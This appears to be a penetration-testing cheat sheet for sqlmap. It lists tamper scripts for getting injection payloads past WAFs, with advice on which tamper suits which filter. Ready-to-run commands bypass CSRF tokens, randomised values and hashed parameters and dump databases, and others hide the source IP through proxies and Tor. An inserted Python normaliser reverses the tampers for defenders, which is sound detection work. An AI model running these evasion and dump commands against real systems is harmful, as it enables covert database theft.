Tamper Scripts
| Tamper-Script | Description |
|---|---|
| 0eunion | Replaces instances of UNION with e0UNION |
| base64encode | Base64-encodes all characters in a given payload |
| between | Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND # |
| commalesslimit | Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart |
| equaltolike | Replaces all occurrences of operator equal (=) with LIKE counterpart |
| halfversionedmorekeywords | Adds (MySQL) versioned comment before each keyword |
| modsecurityversioned | Embraces complete query with (MySQL) versioned comment |
| modsecurityzeroversioned | Embraces complete query with (MySQL) zero-versioned comment |
| percentage | Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T) |
| plus2concat | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
| randomcase | Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) |
| space2comment | Replaces space character ( ) with comments (/**/) |
| space2dash | Replaces space character ( ) with a dash comment (--) followed by a random string and a new line (\n) |
| space2hash | Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line (\n) |
| space2mssqlblank | Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters |
| space2plus | Replaces space character ( ) with plus (+) |
| space2randomblank | Replaces space character ( ) with a random blank character from a valid set of alternate characters |
| symboliclogical | Replaces AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| versionedkeywords | Encloses each non-function keyword with (MySQL) versioned comment |
| versionedmorekeywords | Encloses each keyword with (MySQL) versioned comment |
How to choose the RIGHT tamper (logic)
--tamper=PARAM1,PARAM2
| Symptom | Likely Filter | Tamper |
|---|---|---|
| Spaces blocked | Regex filter | space2comment |
| Keywords blocked | Case-sensitive WAF | randomcase |
| Quotes blocked | Input filter | apostrophemask |
| Operators blocked | Simple blacklist | between |
| Encoding accepted | Weak decoding | charencode |
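The two tables above read as a map from a brittle filter to the tamper that slips past it. The following is an added example (not from this page and not sqlmap's own code) showing the defender's side of that map: a normaliser that undoes each listed transformation before a signature check, run over constructed sample payloads that mirror the tamper descriptions. The `NAIVE` regex is an assumption standing in for the "Likely Filter" column (case-sensitive, expects literal spaces and operators); the sample strings are constructed, not captured traffic.

```python
"""Defender-side normaliser for the tamper transformations in the table.

Added example for this page; not sqlmap code. Sample payloads below are
constructed to mirror each tamper's description, not real captured input.
"""
import re
from urllib.parse import unquote

# Assumed stand-in for the table's "Likely Filter": a case-sensitive regex
# over the raw parameter that expects real spaces and literal operators.
NAIVE = re.compile(r"UNION\s+SELECT|\b(?:AND|OR)\s+\d+=\d+")

# The same signature applied after normalize(): by then the input is
# upper-case, single-spaced and comment-free.
SIGNATURE = re.compile(r"UNION SELECT|\b(?:AND|OR) \S+ ?(?:=|>|<|LIKE|BETWEEN)")


def naive_filter(payload: str) -> bool:
    """What the brittle filter decides on the raw payload."""
    return bool(NAIVE.search(payload))


def normalize(payload: str) -> str:
    """Canonicalise a parameter value so keyword signatures fire again."""
    s = payload
    # charencode / double encoding: decode %XX until stable (bounded loop)
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    # percentage: a '%' not followed by two hex digits is ignored by the
    # target parser, so drop it here too (%S%E%L%E%C%T -> SELECT)
    s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", s)
    # space2plus: '+' in a query string is a space
    s = s.replace("+", " ")
    # versionedkeywords / versionedmorekeywords / modsecurity*versioned:
    # keep the body of /*!NNNNN ... */ because MySQL executes it
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # space2comment and any other inline comment: /* ... */ -> space
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # space2dash / space2hash: '--rnd\n' and '#rnd\n' -> space
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)
    # symboliclogical: back to the word forms
    s = s.replace("&&", " AND ").replace("||", " OR ")
    # space2mssqlblank / space2randomblank: any control/blank char -> space
    s = re.sub(r"[\x00-\x20\x7f\xa0]+", " ", s)
    # randomcase: fold case
    return s.strip().upper()


def normalized_filter(payload: str) -> bool:
    """Signature check after normalisation."""
    return bool(SIGNATURE.search(normalize(payload)))


# Constructed payloads, one per tamper described in the table.
TAMPERED_SAMPLES = {
    "plain":             "1 UNION SELECT 1,2",
    "space2comment":     "1/**/UNION/**/SELECT/**/1,2",
    "randomcase":        "1 uNiOn SeLeCt 1,2",
    "percentage":        "1 %U%N%I%O%N %S%E%L%E%C%T 1,2",
    "versionedkeywords": "1 /*!50000UNION*/ /*!50000SELECT*/ 1,2",
    "space2hash":        "1#rnd\nUNION#rnd\nSELECT#rnd\n1,2",
    "space2plus":        "1+UNION+SELECT+1,2",
    "symboliclogical":   "1 && 1=1",
    "between":           "1 AND 1 BETWEEN 1 AND 1",
    "equaltolike":       "1 AND 1 LIKE 1",
}


def compare(samples=TAMPERED_SAMPLES) -> dict:
    """Return {name: (naive_hit, normalized_hit)} for every sample."""
    return {n: (naive_filter(p), normalized_filter(p)) for n, p in samples.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:18} naive={naive!s:5} normalized={norm}")
```

Only the plain payload trips the naive regex; every tampered variant is missed by it and caught once normalised. The order of steps matters: percent-decoding runs first so that an encoded `%0A` becomes the newline the comment rules expect, and blank-collapsing runs last so the `--`/`#` rules still see their terminating newline.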
Anti-CSRF Token Bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Unique Value Bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 --dump
Calculated Parameter Bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()" --batch -v 5 --dump
User-agent Blacklisting Bypass
--random-agent
IP Address Concealing
--proxy (e.g. --proxy="socks4://177.39.187.70:33283")
--proxy-file
--check-tor
Chunked
--chunked